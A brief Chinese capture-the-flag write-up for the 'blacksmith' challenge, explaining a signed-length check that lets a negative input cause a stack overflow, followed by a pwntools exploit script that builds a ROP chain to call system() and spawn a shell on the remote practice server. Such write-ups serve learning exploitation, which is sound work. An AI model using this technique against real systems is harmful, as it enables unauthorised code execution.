Loading... 整数溢出,`size_t`是一个不小压力机器字长的无符号整型,然鹅判断长度的时候 <div style="text-align:center"><img src="https://www.cjovi.icu/usr/uploads/2021/01/2936428237.png "></div> 这里用的是`signed int`,所以我们输入一个负数就可以轻松栈溢出了 ### exp ~~~python #!/usr/bin/env python # coding=utf-8 from pwn import * context(log_level = 'debug') pop_rdi = 0x400b23 #sh = process("./metasequoia_2020_blacksmith") sh = remote("node3.buuoj.cn",28754) elf = ELF("./metasequoia_2020_blacksmith") sh.sendlineafter("choice > ","1") sh.sendlineafter("name?\n",'-1') payload = 'a' * 0x40 + 'b' * 8 + p64(pop_rdi) + p64(0x400b48) + p64(elf.symbols['system']) sh.sendlineafter("is?\n",payload) sh.interactive() ~~~ 最后修改:2021 年 01 月 14 日 07 : 09 PM © 允许规范转载 赞赏 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧 ×Close 赞赏作者 扫一扫支付 支付宝支付 微信支付
